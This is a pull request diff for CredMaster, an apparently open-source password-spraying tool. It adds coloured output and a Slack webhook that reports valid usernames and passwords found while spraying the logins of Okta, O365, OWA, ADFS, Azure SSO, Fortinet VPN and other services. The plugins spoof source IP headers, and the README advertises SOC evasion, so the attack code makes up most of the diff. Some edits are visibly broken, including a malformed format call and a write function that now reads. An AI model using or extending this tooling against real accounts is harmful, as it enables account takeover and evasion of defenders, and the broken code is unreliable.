### PR TITLE
Colours added + slack notifier module

### DIFF
--- a/README.md
+++ b/README.md
@@ -10,6 +10,18 @@ For detection tips, see the blogpost and detection section.
 
 **Be careful for account lockouts, know the reset policies of your target**
 
+## TL;DR
+1. git clone the repo down
+2. If unsure how to create correct keys see this [blog](https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b).
+3. `pip install -r requirements.txt`
+4. [Optional] Add your slack webhook URL into config-vars.json if you want to use a webhook for when credentials are successfully guessed! (thanks to Ian for the function for notifications)
+
+```
+{
+	"slack_webhook":"YOURURLHERE"
+}
+```
+
 
 ## Benefits & Features ##
 
@@ -21,6 +33,7 @@ For detection tips, see the blogpost and detection section.
 * Easily add new plugins
 * [WeekdayWarrior](https://github.com/knavesec/CredMaster/wiki/Weekday-Warrior) setting for timed spraying and SOC evasion
 * Fully [anonymous](https://github.com/knavesec/CredMaster/wiki/Anonymity)
+* Colourised output & slack notifications
 
 ![general](https://raw.githubusercontent.com/whynotsecurity/whynotsecurity.github.io/master/assests/images/credmaster-screenshots/credmaster-default.png)
 

--- a/README.md
+++ b/README.md
@@ -96,6 +96,7 @@ PRs welcome :)
 - x0rz - GmailEnum technique
 - Kole Swesey ([0xPanic_](https://twitter.com/0xPanic_)) - Assorted PR
 - Logan ([TheToddLuci0](https://twitter.com/TheToddLuci0)) - Assorted PRs
+- Andy Gill ([ZephrFish](https://twitter.com/ZephrFish)) - Colour functions + Tweaks/Notifications
 
 
 Feel free to drop me a line

--- a/config-vars.json
+++ b/config-vars.json
@@ -1,0 +1,3 @@
+{
+	"slack_webhook":"YOURURLHERE"
+}

--- a/credmaster.py
+++ b/credmaster.py
@@ -152,6 +152,7 @@ def main(args,pargs):
 		log_entry("Starting Spray...")
 
 		count = 0
+		time_count = 0
 		passwords = ["Password123"]
 		if userpass_file is None and not userenum:
 			passwords = load_file(password_file)

--- a/credmaster.py
+++ b/credmaster.py
@@ -2,6 +2,7 @@
 # from zipfile import *
 import threading, queue, argparse, datetime, json, importlib, random, os, time
 from fire import FireProx
+import utils.utils as utils
 
 credentials = { 'accounts':[] }
 regions = [
@@ -156,6 +157,12 @@ def main(args,pargs):
 			passwords = load_file(password_file)
 
 		for password in passwords:
+    			
+			time_count += 1
+			if time_count == 1:
+				utils.slackupdate("Info: Spray Starting.\nPass: " + password)
+			else:
+				utils.slackupdate("Info: Spray Continuing.\nPass: " + password)
 
 			if weekdaywarrior is not None:
 				spray_days = {
@@ -545,7 +552,7 @@ if __name__ == '__main__':
 	adv_args.add_argument('--passwordsperdelay', type=int, default=1, required=False, help='Number of passwords to be tested per delay cycle')
 	adv_args.add_argument('-r', '--randomize', required=False, action="store_true", help='Randomize the input list of usernames to spray (will remain the same password)')
 	adv_args.add_argument('--header', default=None, required=False, help='Add a custom header to each request for attribution, specify "X-Header: value"')
-	adv_args.add_argument('--weekday-warrior', default=None, required=False, help="If you don't know what this is don't use it, input is timezone UTC offset")
+	adv_args.add_argument('--weekday-warrior', default=None, required=False, help="If you don't know what this is don't use it, input is timezone UTC offset"))
 
 	fp_args = parser.add_argument_group(title='Fireprox Connection Inputs')
 	fp_args.add_argument('--profile_name', type=str, default=None, help='AWS Profile Name to store/retrieve credentials')

--- a/credmaster.py
+++ b/credmaster.py
@@ -161,9 +161,9 @@ def main(args,pargs):
     			
 			time_count += 1
 			if time_count == 1:
-				utils.slackupdate("Info: Spray Starting.\nPass: " + password)
+				utils.slacklog("Info: Spray Starting.\nPass: " + password)
 			else:
-				utils.slackupdate("Info: Spray Continuing.\nPass: " + password)
+				utils.slacklog("Info: Spray Continuing.\nPass: " + password)
 
 			if weekdaywarrior is not None:
 				spray_days = {

--- a/credmaster.py
+++ b/credmaster.py
@@ -553,7 +553,7 @@ if __name__ == '__main__':
 	adv_args.add_argument('--passwordsperdelay', type=int, default=1, required=False, help='Number of passwords to be tested per delay cycle')
 	adv_args.add_argument('-r', '--randomize', required=False, action="store_true", help='Randomize the input list of usernames to spray (will remain the same password)')
 	adv_args.add_argument('--header', default=None, required=False, help='Add a custom header to each request for attribution, specify "X-Header: value"')
-	adv_args.add_argument('--weekday-warrior', default=None, required=False, help="If you don't know what this is don't use it, input is timezone UTC offset"))
+	adv_args.add_argument('--weekday-warrior', default=None, required=False, help="If you don't know what this is don't use it, input is timezone UTC offset")
 
 	fp_args = parser.add_argument_group(title='Fireprox Connection Inputs')
 	fp_args.add_argument('--profile_name', type=str, default=None, help='AWS Profile Name to store/retrieve credentials')

--- a/plugins/adfs/adfs.py
+++ b/plugins/adfs/adfs.py
@@ -68,14 +68,15 @@ def adfs_authenticate(url, username, password, useragent, pluginargs):
         data_response['code'] = resp.status_code
 
         if resp.status_code == 302:
+            utils.slacknotify(username, password)
             data_response['success'] = True
-            data_response['output'] = 'SUCCESS_MESSAGE: => {}:{}'.format(
-                username, password)
+            data_response['output'] = utils.prGreen('SUCCESS_MESSAGE: => {}:{}'.format(
+                username, password))
 
         else:  # fail
             data_response['success'] = False
-            data_response['output'] = 'FAILURE_MESSAGE: {} => {}:{}'.format(
-                resp.status_code, username, password)
+            data_response['output'] = utils.prRed('FAILURE_MESSAGE: {} => {}:{}'.format(
+                resp.status_code, username, password))
 
     except Exception as ex:
         data_response['error'] = True

--- a/plugins/azuresso/azuresso.py
+++ b/plugins/azuresso/azuresso.py
@@ -104,6 +104,7 @@ def azuresso_authenticate(url, username, password, useragent, pluginargs):
         elif "AADSTS50126" in xmlresponse:
             data_response['output'] = utils.prYellow("[+] VALID USERNAME, invalid password: {}".format(creds))
             data_response['success'] = False
+            utils.slacklog("Alert: Username valid but password incorrect")
 
         elif "DesktopSsoToken" in xmlresponse:
             data_response['output'] = utils.prGreen("[+] VALID CREDS : {}".format(creds))
@@ -117,14 +118,17 @@ def azuresso_authenticate(url, username, password, useragent, pluginargs):
         elif "AADSTS50056" in xmlresponse:
             data_response['output'] = utils.prYellow("[+] VALID USERNAME, no password in AzureAD: {}".format(creds))
             data_response['success'] = False
+            utils.slacklog("Alert: Username valid but password is not in AzureAD")
 
         elif "AADSTS80014" in xmlresponse:
             data_response['output'] = utils.prYellow("[+] VALID USERNAME, max pass-through authentication time exceeded :{}".format(creds))
             data_response['success'] = False
+            utils.slacklog("Alert: Username valid but max pass-through authentication time exceeded")
 
         elif "AADSTS50053" in xmlresponse:
             data_response['output'] = utils.prYellow("[?] SMART LOCKOUT DETECTED - Unable to enumerate:{}".format(creds))
             data_response['success'] = False
+            utils.slacklog("Alert: SMART LOCKOUT DETECTED")
 
         else:
             data_response['output'] = utils.prYellow("[!] Unknown Response : {}".format(creds))

--- a/plugins/azuresso/azuresso.py
+++ b/plugins/azuresso/azuresso.py
@@ -2,7 +2,6 @@ import datetime, requests, uuid, re
 import utils.utils as utils
 requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
 
-
 def azuresso_authenticate(url, username, password, useragent, pluginargs):
 
     ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
@@ -103,31 +102,32 @@ def azuresso_authenticate(url, username, password, useragent, pluginargs):
             data_response['success'] = False
 
         elif "AADSTS50126" in xmlresponse:
-            data_response['output'] = "[+] VALID USERNAME, invalid password: {}".format(creds)
+            data_response['output'] = utils.prYellow("[+] VALID USERNAME, invalid password: {}".format(creds))
             data_response['success'] = False
 
         elif "DesktopSsoToken" in xmlresponse:
-            data_response['output'] = "[+] VALID CREDS : {}".format(creds)
+            data_response['output'] = utils.prGreen("[+] VALID CREDS : {}".format(creds))
             data_response['success'] = True
+            utils.slacknotify(username, password)
 
             token = re.findall(r"<DesktopSsoToken>.{1,}</DesktopSsoToken>", xmlresponse)
             if (token):
                 data_response['output'] += " - GOT TOKEN {}".format(token[0])
 
         elif "AADSTS50056" in xmlresponse:
-            data_response['output'] = "[+] VALID USERNAME, no password in AzureAD: {}".format(creds)
+            data_response['output'] = utils.prYellow("[+] VALID USERNAME, no password in AzureAD: {}".format(creds))
             data_response['success'] = False
 
         elif "AADSTS80014" in xmlresponse:
-            data_response['output'] = "[+] VALID USERNAME, max pass-through authentication time exceeded :{}".format(creds)
+            data_response['output'] = utils.prYellow("[+] VALID USERNAME, max pass-through authentication time exceeded :{}".format(creds))
             data_response['success'] = False
 
         elif "AADSTS50053" in xmlresponse:
-            data_response['output'] = "[?] SMART LOCKOUT DETECTED - Unable to enumerate:{}".format(creds)
+            data_response['output'] = utils.prYellow("[?] SMART LOCKOUT DETECTED - Unable to enumerate:{}".format(creds))
             data_response['success'] = False
 
         else:
-            data_response['output'] = "[!] Unknown Response : {}".format(creds)
+            data_response['output'] = utils.prYellow("[!] Unknown Response : {}".format(creds))
             data_response['success'] = False
 
 

--- a/plugins/ews/ews.py
+++ b/plugins/ews/ews.py
@@ -3,7 +3,6 @@ from requests_ntlm import HttpNtlmAuth
 import utils.utils as utils
 requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
 
-
 def ews_authenticate(url, username, password, useragent, pluginargs):
 
     ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
@@ -48,11 +47,19 @@ def ews_authenticate(url, username, password, useragent, pluginargs):
 
         if resp.status_code != 401:
             data_response['success'] = True
-            data_response['output'] = f"[+] Found credentials, code: {resp.status_code}: {username}:{password}"
-
+            data_response['output'] = utils.prGreen(f"[+] Found credentials, code: {resp.status_code}: {username}:{password}")
+            utils.slacknotify(username, password)
+        elif resp.status_code == 500:
+            data_response['output'] = utils.prYellow(f"[*] WARNING: Found credentials, but server returned 500: {username}:{password}")
+            data_response['success'] = False 
+            utils.slacknotify(username, password)
+        elif resp.status_code == 504:
+            data_response['output'] = utils.prYellow(f"[*] Potential Credentials, but server returned 504: {username}:{password}")
+            data_response['success'] = False 
         else:
             data_response['success'] = False
-            data_response['output'] = f"[-] Authentication failed: {username}:{password} (Invalid credentials)"
+            data_response['output'] = utils.prRed(f"[-] Authentication failed: {username}:{password} (Invalid credentials)")
+
 
     except Exception as ex:
         data_response['error'] = True

--- a/plugins/fortinetvpn/fortinetvpn.py
+++ b/plugins/fortinetvpn/fortinetvpn.py
@@ -1,7 +1,6 @@
 import datetime, requests
 import utils.utils as utils
 
-
 def fortinetvpn_authenticate(url, username, password, useragent, pluginargs):
 
     ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
@@ -57,13 +56,14 @@ def fortinetvpn_authenticate(url, username, password, useragent, pluginargs):
 
         if resp.status_code == 200 and 'redir=' in resp.text and '&portal=' in resp.text:
             data_response['success'] = True
-            data_response['output'] = 'SUCCESS: => {}:{}'.format(username, password)
+            data_response['output'] = utils.prGreen('SUCCESS: => {}:{}'.format(username, password))
+            utils.slacknotify(username, password)
             if 'domain' in pluginargs.keys():
                 data_response['output'] = data_response['output'] + " Domain: {}".format(pluginargs['domain'])
 
         else: #fail
             data_response['success'] = False
-            data_response['output'] = 'FAILURE: {} => {}:{}'.format(resp.status_code, username, password)
+            data_response['output'] = utils.prRed('FAILURE: {} => {}:{}'.format(resp.status_code, username, password))
 
 
     except Exception as ex:

--- a/plugins/gmailenum/gmailenum.py
+++ b/plugins/gmailenum/gmailenum.py
@@ -45,6 +45,7 @@ def gmailenum_authenticate(url, username, password, useragent, pluginargs):
         if "Set-Cookie" in resp.headers.keys():
             data_response['success'] = False
             data_response['output'] = 'VALID USER: {} - Status: {}'.format(username, resp.status_code)
+            utils.slacklog("Valid Gmail/GSuite User found...")
             utils.slacknotify(username)
 
         else:

--- a/plugins/gmailenum/gmailenum.py
+++ b/plugins/gmailenum/gmailenum.py
@@ -45,6 +45,7 @@ def gmailenum_authenticate(url, username, password, useragent, pluginargs):
         if "Set-Cookie" in resp.headers.keys():
             data_response['success'] = False
             data_response['output'] = 'VALID USER: {} - Status: {}'.format(username, resp.status_code)
+            utils.slacknotify(username)
 
         else:
             data_response['success'] = False

--- a/plugins/httpbrute/httpbrute.py
+++ b/plugins/httpbrute/httpbrute.py
@@ -2,9 +2,8 @@ import datetime, requests, requests_ntlm
 import utils.utils as utils
 requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
 
-
-def httpbrute_authenticate(url, username, password, useragent, pluginargs): # CHANGEME: replace template with plugin name
-
+def httpbrute_authenticate(url, username, password, useragent, pluginargs): 
+    
     ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
 
     data_response = {
@@ -61,15 +60,16 @@ def httpbrute_authenticate(url, username, password, useragent, pluginargs): # CH
 
         if resp.status_code == 200:
             data_response['success'] = True
-            data_response['output'] = 'SUCCESS: => {}:{}'.format(username, password)
+            data_response['output'] = utils.prGreen('[!] SUCCESS: => {}:{}'.format(username, password))
+            utils.slacknotify(username, password)
 
         elif resp.status_code == 401:
             data_response['success'] = False
-            data_response['output'] = 'FAILURE: => {}:{}'.format(username, password)
+            data_response['output'] = utils.prRed('FAILURE: => {}:{}'.format(username, password))
 
         else: #fail
             data_response['success'] = False
-            data_response['output'] = 'UNKNOWN_RESPONSE_CODE: {} => {}:{}'.format(resp.status_code, username, password)
+            data_response['output'] = utils.prYellow('UNKNOWN_RESPONSE_CODE: {} => {}:{}'.format(resp.status_code, username, password))
 
 
     except Exception as ex:

--- a/plugins/msol/msol.py
+++ b/plugins/msol/msol.py
@@ -81,7 +81,7 @@ def msol_authenticate(url, username, password, useragent, pluginargs):
                 data_response['success'] = True
                 data_response['code'] = "2FA Microsoft"
                 data_response['output'] = utils.prYellow(f"SUCCESS! {resp.status_code} {username}:{password} - NOTE: The response indicates MFA (Microsoft) is in use.")
-                utils.slackupdate("The response indicates MFA (Microsoft) is in use.")
+                utils.slacklog("The response indicates MFA (Microsoft) is in use.")
                 utils.slacknotify(username, password)
 
 
@@ -91,7 +91,7 @@ def msol_authenticate(url, username, password, useragent, pluginargs):
                 data_response['success'] = True
                 data_response['code'] = "2FA Other"
                 data_response['output'] = utils.prYellow(f"SUCCESS! {resp.status_code} {username}:{password} - NOTE: The response indicates conditional access (MFA: DUO or other) is in use.")
-                utils.slackupdate("The response indicates conditional access (MFA: DUO or other) is in use.")
+                utils.slacklog("The response indicates conditional access (MFA: DUO or other) is in use.")
                 utils.slacknotify(username, password)
 
             elif "AADSTS50053" in error:

--- a/plugins/o365/o365.py
+++ b/plugins/o365/o365.py
@@ -44,16 +44,16 @@ def o365_authenticate(url, username, password, useragent, pluginargs):
         r = requests.get("{}/autodiscover/autodiscover.xml".format(url), auth=(username, password), headers=headers, verify=False, timeout=30)
 
         if r.status_code == 200:
-            data_response['output'] = prGreen("[!] SUCCESS: {username}:{password}".format(username=username,password=password))
+            data_response['output'] = utils.prGreen("[!] SUCCESS: {username}:{password}".format(username=username,password=password))
             data_response['success'] = True
             utils.slacknotify(username, password)
         elif r.status_code == 456:
-            data_response['output'] = prGreen("[!]SUCCESS: {username}:{password} - 2FA or Locked".format(username=username,password=password))
+            data_response['output'] = utils.prGreen("[!]SUCCESS: {username}:{password} - 2FA or Locked".format(username=username,password=password))
             data_response['success'] = True
             utils.slackupdate("Credentials Valid but MFA enabled or account locked out!")
             utils.slacknotify(username, password)
         else:
-            data_response['output'] = prRed("FAILED: {username}:{password}".format(username=username,password=password))
+            data_response['output'] =  utils.prRed("FAILED: {username}:{password}".format(username=username,password=password))
             data_response['success'] = False
 
 

--- a/plugins/o365/o365.py
+++ b/plugins/o365/o365.py
@@ -46,11 +46,12 @@ def o365_authenticate(url, username, password, useragent, pluginargs):
         if r.status_code == 200:
             data_response['output'] = utils.prGreen("[!] SUCCESS: {username}:{password}".format(username=username,password=password))
             data_response['success'] = True
+            utils.slacklog("Valid Credentials found!!")
             utils.slacknotify(username, password)
         elif r.status_code == 456:
             data_response['output'] = utils.prGreen("[!]SUCCESS: {username}:{password} - 2FA or Locked".format(username=username,password=password))
             data_response['success'] = True
-            utils.slackupdate("Credentials Valid but MFA enabled or account locked out!")
+            utils.slacklog("Credentials Valid but MFA enabled or account locked out!")
             utils.slacknotify(username, password)
         else:
             data_response['output'] =  utils.prRed("FAILED: {username}:{password}".format(username=username,password=password))

--- a/plugins/o365/o365.py
+++ b/plugins/o365/o365.py
@@ -2,7 +2,6 @@ import datetime, requests
 import utils.utils as utils
 requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
 
-
 def o365_authenticate(url, username, password, useragent, pluginargs):
 
     ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
@@ -45,13 +44,16 @@ def o365_authenticate(url, username, password, useragent, pluginargs):
         r = requests.get("{}/autodiscover/autodiscover.xml".format(url), auth=(username, password), headers=headers, verify=False, timeout=30)
 
         if r.status_code == 200:
-            data_response['output'] = "SUCCESS: {username}:{password}".format(username=username,password=password)
+            data_response['output'] = prGreen("[!] SUCCESS: {username}:{password}".format(username=username,password=password))
             data_response['success'] = True
+            utils.slacknotify(username, password)
         elif r.status_code == 456:
-            data_response['output'] = "SUCCESS: {username}:{password} - 2FA or Locked".format(username=username,password=password)
+            data_response['output'] = prGreen("[!]SUCCESS: {username}:{password} - 2FA or Locked".format(username=username,password=password))
             data_response['success'] = True
+            utils.slackupdate("Credentials Valid but MFA enabled or account locked out!")
+            utils.slacknotify(username, password)
         else:
-            data_response['output'] = "FAILED: {username}:{password}".format(username=username,password=password)
+            data_response['output'] = prRed("FAILED: {username}:{password}".format(username=username,password=password))
             data_response['success'] = False
 
 

--- a/plugins/o365enum/o365enum.py
+++ b/plugins/o365enum/o365enum.py
@@ -1,7 +1,6 @@
 import datetime, requests
 import utils.utils as utils
 
-
 def o365enum_authenticate(url, username, password, useragent, pluginargs):
 
     ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
@@ -28,6 +27,7 @@ def o365enum_authenticate(url, username, password, useragent, pluginargs):
     spoofed_ip = utils.generate_ip()
     amazon_id = utils.generate_id()
     trace_id = utils.generate_trace_id()
+
 
     headers = {
         'User-Agent': useragent,
@@ -60,12 +60,10 @@ def o365enum_authenticate(url, username, password, useragent, pluginargs):
         domain = username.split("@")[1]
 
         if domain_type != "MANAGED":
-            data_response['output'] = "WARNING: {username} Domain type {domaintype} not supported for user enum".format(username=username,domaintype=domain_type)
-
+            data_response['output'] = utils.prYellow("WARNING: {username} Domain type {domaintype} not supported for user enum".format(username=username,)domaintype=domain_type)
         elif throttle_status != 0 or if_exists_result_response == "THROTTLE":
-            data_response['output'] = "WARNING: Throttle detected on user {}".format(username=username)
+            data_response['output'] = utils.prYellow("WARNING: Throttle detected on user {}".format(username=username))
             data_response['throttled'] = True
-
         else:
             data_response['output'] = "{if_exists_result_response}: {username}".format(if_exists_result_response=if_exists_result_response, username=username)
 

--- a/plugins/okta/okta.py
+++ b/plugins/okta/okta.py
@@ -52,7 +52,7 @@ def okta_authenticate(url, username, password, useragent, pluginargs):
                 data_response['success'] = False
                 data_response['output'] ='FAILED: Locked out {}:{}'.format(username, password)
                 data_response['action'] = 'redirect'
-                utils.slackupdate("Alert: Accounts are being locked out.")
+                utils.slacklog("Alert: Accounts are being locked out. Consider stopping spray")
 
             elif resp_json.get("status") == "SUCCESS":
                 data_response['success'] = True
@@ -73,24 +73,25 @@ def okta_authenticate(url, username, password, useragent, pluginargs):
 
             elif resp_json.get("status") == "MFA_ENROLL":
                 data_response['success'] = True
-                data_response['output'] = "SUCCESS: MFA enrollment required {}:{}".format(username,password)
-                utils.slacknotify(username, password + "\nInfo: MFA IS UNCONFIGURED!")
+                data_response['output'] = utils.prGreen("SUCCESS: MFA enrollment required {}:{}".format(username,password))
+                utils.slacknotify(username, password + "\nInfo: MFA is not configured!")
 
             else:
                 data_response['success'] = False
                 data_response['output'] = utils.prYellow("ALERT: 200 but doesn't indicate success {}:{}".format(username,password))
-                utils.slackupdate("Alert: Somethings weird..")
+                utils.slacklog("Alert: We got a 200 but it is not clear if creds are valid")
+                utils.slacknotify(username, password + "\nInfo: May be valid, proceed with caution!")
 
         elif resp.status_code == 403:
                 data_response['success'] = False
                 data_response['code'] = resp.status_code
                 data_response['output'] = utils.prRed("[!] FAILED THROTTLE INDICATED: {} => {}:{}".format(resp.status_code, username, password))
-                utils.slackupdate("Alert: Throttle Detected..")
+                utils.slacklog("Alert: Throttle Detected, proceed with caution")
 
         else:
             data_response['success'] = False
             data_response['code'] = resp.status_code
-            data_response['output'] = "FAILED: {} => {}:{}".format(resp.status_code, username, password)
+            data_response['output'] = utils.prRed("FAILED: {} => {}:{}".format(resp.status_code, username, password))
 
 
     except Exception as ex:

--- a/plugins/okta/okta.py
+++ b/plugins/okta/okta.py
@@ -4,90 +4,98 @@ import utils.utils as utils
 
 def okta_authenticate(url, username, password, useragent, pluginargs):
 
-	ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
+    ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
 
-	data_response = {
-		'timestamp': ts,
-		'username': username,
-		'password': password,
-		'success': False,
-		'change': False,
-		'2fa_enabled': False,
-		'type': None,
-		'code': None,
-		'name': None,
-		'action': None,
-		'headers': [],
-		'cookies': [],
-		'sourceip' : None,
-		'throttled' : False,
-		'error' : False,
-		'output' : ""
-	}
+    data_response = {
+            'timestamp': ts,
+            'username': username,
+            'password': password,
+            'success': False,
+            'change': False,
+            '2fa_enabled': False,
+            'type': None,
+            'code': None,
+            'name': None,
+            'action': None,
+            'headers': [],
+            'cookies': [],
+            'sourceip' : None,
+            'throttled' : False,
+            'error' : False,
+            'output' : ""
+    }
 
-	raw_body = "{\"username\":\"%s\",\"password\":\"%s\",\"options\":{\"warnBeforePasswordExpired\":true,\"multiOptionalFactorEnroll\":true}}" % (username, password)
+    raw_body = "{\"username\":\"%s\",\"password\":\"%s\",\"options\":{\"warnBeforePasswordExpired\":true,\"multiOptionalFactorEnroll\":true}}" % (username, password)
 
-	spoofed_ip = utils.generate_ip()
-	amazon_id = utils.generate_id()
-	trace_id = utils.generate_trace_id()
+    spoofed_ip = utils.generate_ip()
+    amazon_id = utils.generate_id()
+    trace_id = utils.generate_trace_id()
 
-	headers = {
-		'User-Agent': useragent,
-		"X-My-X-Forwarded-For" : spoofed_ip,
-		"x-amzn-apigateway-api-id" : amazon_id,
-		"X-My-X-Amzn-Trace-Id" : trace_id,
+    headers = {
+            'User-Agent': useragent,
+            "X-My-X-Forwarded-For" : spoofed_ip,
+            "x-amzn-apigateway-api-id" : amazon_id,
+            "X-My-X-Amzn-Trace-Id" : trace_id,
 
-		'Content-Type': 'application/json'
-	}
+            'Content-Type': 'application/json'
+    }
 
-	headers = utils.add_custom_headers(pluginargs, headers)
+    headers = utils.add_custom_headers(pluginargs, headers)
 
-	try:
-		resp = requests.post("{}/api/v1/authn/".format(url),data=raw_body,headers=headers)
+    try:
+        resp = requests.post("{}/api/v1/authn/".format(url),data=raw_body,headers=headers)
 
-		if resp.status_code == 200:
-			resp_json = json.loads(resp.text)
+        if resp.status_code == 200:
+            resp_json = json.loads(resp.text)
 
-			if resp_json.get("status") == "LOCKED_OUT": #Warning: administrators can configure Okta to not indicate that an account is locked out. Fair warning ;)
-				data_response['success'] = False
-				data_response['output'] ='FAILED: Locked out {}:{}'.format(username, password)
-				data_response['action'] = 'redirect'
+            if resp_json.get("status") == "LOCKED_OUT": #Warning: administrators can configure Okta to not indicate that an account is locked out. Fair warning ;)
+                data_response['success'] = False
+                data_response['output'] ='FAILED: Locked out {}:{}'.format(username, password)
+                data_response['action'] = 'redirect'
+                utils.slackupdate("Alert: Accounts are being locked out.")
 
-			elif resp_json.get("status") == "SUCCESS":
-				data_response['success'] = True
-				data_response['output'] = 'SUCCESS: => {}:{}'.format(username, password)
+            elif resp_json.get("status") == "SUCCESS":
+                data_response['success'] = True
+                data_response['output'] = utils.prGreen('SUCCESS: => {}:{}'.format(username, password))
+                utils.slacknotify(username, password + "\nInfo: NO MFA Required!")
 
-			elif resp_json.get("status") == "MFA_REQUIRED":
-				data_response['2fa_enabled'] = True
-				data_response['success'] = True
-				data_response['output'] = "SUCCESS: 2FA => {}:{}".format(username,password)
+            elif resp_json.get("status") == "MFA_REQUIRED":
+                data_response['2fa_enabled'] = True
+                data_response['success'] = True
+                data_response['output'] = utils.prGreen("SUCCESS: 2FA => {}:{}".format(username,password))
+                utils.slacknotify(username, password + "\nInfo: MFA Configured.")
 
-			elif resp_json.get("status") == "PASSWORD_EXPIRED":
-				data_response['change'] = True
-				data_response['success'] = True
-				data_response['output'] = "SUCCESS: password expired {}:{}".format(username,password)
+            elif resp_json.get("status") == "PASSWORD_EXPIRED":
+                data_response['change'] = True
+                data_response['success'] = True
+                data_response['output'] = utils.prGreen("SUCCESS: password expired {}:{}".format(username,password))
+                utils.slacknotify(username, password + "\nInfo: Password Expired.")
 
-			elif resp_json.get("status") == "MFA_ENROLL":
-				data_response['success'] = True
-				data_response['output'] = "SUCCESS: MFA enrollment required {}:{}".format(username,password)
+            elif resp_json.get("status") == "MFA_ENROLL":
+                data_response['success'] = True
+                data_response['output'] = "SUCCESS: MFA enrollment required {}:{}".format(username,password)
+                utils.slacknotify(username, password + "\nInfo: MFA IS UNCONFIGURED!")
 
-			else:
-				data_response['success'] = False
-				data_response['output'] = "ALERT: 200 but doesn't indicate success {}:{}".format(username,password)
+            else:
+                data_response['success'] = False
+                data_response['output'] = utils.prYellow("ALERT: 200 but doesn't indicate success {}:{}".format(username,password))
+                utils.slackupdate("Alert: Somethings weird..")
 
-		elif resp.status_code == 403:
-			data_response['success'] = False
-			data_response['code'] = resp.status_code
-			data_response['output'] = "FAILED THROTTLE INDICATED: {} => {}:{}".format(resp.status_code, username, password)
+        elif resp.status_code == 403:
+                data_response['success'] = False
+                data_response['code'] = resp.status_code
+                data_response['output'] = utils.prRed("[!] FAILED THROTTLE INDICATED: {} => {}:{}".format(resp.status_code, username, password))
+                utils.slackupdate("Alert: Throttle Detected..")
 
-		else:
-			data_response['success'] = False
-			data_response['code'] = resp.status_code
-			data_response['output'] = "FAILED: {} => {}:{}".format(resp.status_code, username, password)
+        else:
+            data_response['success'] = False
+            data_response['code'] = resp.status_code
+            data_response['output'] = "FAILED: {} => {}:{}".format(resp.status_code, username, password)
 
-	except Exception as ex:
-		data_response['error'] = True
-		data_response['output'] = ex
-		pass
 
-	return data_response
+    except Exception as ex:
+        data_response['error'] = True
+        data_response['output'] = ex
+        pass
+
+    return data_response

--- a/plugins/owa/owa.py
+++ b/plugins/owa/owa.py
@@ -52,12 +52,12 @@ def owa_authenticate(url, username, password, useragent, pluginargs):
         elif resp.status_code == 500:
             data_response['output'] = utils.prYellow(f"[*] WARNING: Found credentials, but server returned 500: {username}:{password}")
             data_response['success'] = False
-            utils.slackupdate("Potential Credentials") 
+            utils.slacklog("Potential Credentials") 
             utils.slacknotify(username, password)
         elif resp.status_code == 504:
             data_response['output'] = utils.prYellow(f"[*] Potential Credentials, but server returned 504: {username}:{password}")
             data_response['success'] = False 
-            utils.slackupdate("Potential Credentials")
+            utils.slacklog("Potential Credentials")
             utils.slacknotify(username, password)
         else:
             data_response['output'] = utils.prRed(f"[-] Authentication failed: {username}:{password} (Invalid credentials)")

--- a/plugins/owa/owa.py
+++ b/plugins/owa/owa.py
@@ -3,7 +3,6 @@ from requests_ntlm import HttpNtlmAuth
 import utils.utils as utils
 requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
 
-
 def owa_authenticate(url, username, password, useragent, pluginargs):
 
     ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
@@ -47,10 +46,21 @@ def owa_authenticate(url, username, password, useragent, pluginargs):
         resp = requests.get("{}/autodiscover/autodiscover.xml".format(url), headers=headers, auth=HttpNtlmAuth(username, password), verify=False)
 
         if resp.status_code == 200:
-            data_response['output'] = f"[+] Found credentials: {username}:{password}"
+            data_response['output'] = utils.prGreen(f"[+] SUCCESS: Found credentials: {username}:{password}")
             data_response['success'] = True
+            utils.slacknotify(username, password)
+        elif resp.status_code == 500:
+            data_response['output'] = utils.prYellow(f"[*] WARNING: Found credentials, but server returned 500: {username}:{password}")
+            data_response['success'] = False
+            utils.slackupdate("Potential Credentials") 
+            utils.slacknotify(username, password)
+        elif resp.status_code == 504:
+            data_response['output'] = utils.prYellow(f"[*] Potential Credentials, but server returned 504: {username}:{password}")
+            data_response['success'] = False 
+            utils.slackupdate("Potential Credentials")
+            utils.slacknotify(username, password)
         else:
-            data_response['output'] = f"[-] Authentication failed: {username}:{password} (Invalid credentials)"
+            data_response['output'] = utils.prRed(f"[-] Authentication failed: {username}:{password} (Invalid credentials)")
             data_response['success'] = False
 
 

--- a/requirements.txt
+++ b/requirements.txt
@@ -4,3 +4,4 @@ tzlocal
 bs4
 lxml
 datetime
+json

--- a/requirements.txt
+++ b/requirements.txt
@@ -4,4 +4,3 @@ tzlocal
 bs4
 lxml
 datetime
-json

--- a/utils/json_helper.py
+++ b/utils/json_helper.py
@@ -1,8 +1,7 @@
 import json
+import os
 
-from pathlib import Path
-
-# Json functions for reading slack notifier input
+# Json functions for getting path then reading contents of config variables
 def get_path():
 	"""
 	A function to get the current path to bot.py
@@ -10,7 +9,7 @@ def get_path():
 	Returns:
 	 - cwd (string) : Path to bot.py directory
 	"""
-	cwd = Path(__file__).parent.parent.parent
+	cwd = os.getcwd()
 	#cwd = Path(__file__).resolve().parent[1]
 	cwd = str(cwd)
 	print(cwd)
@@ -42,5 +41,6 @@ def write_json(data, filename):
 	 - filename (string) : The name of the file to write to
 	"""
 	cwd = get_path()
-	with open(cwd + "/" +  filename + ".json", "w") as file:
-		json.dump(data, file, indent=4)
+	with open(cwd + "/" + filename + ".json", "r") as file:
+		data = json.load(file)
+	return data

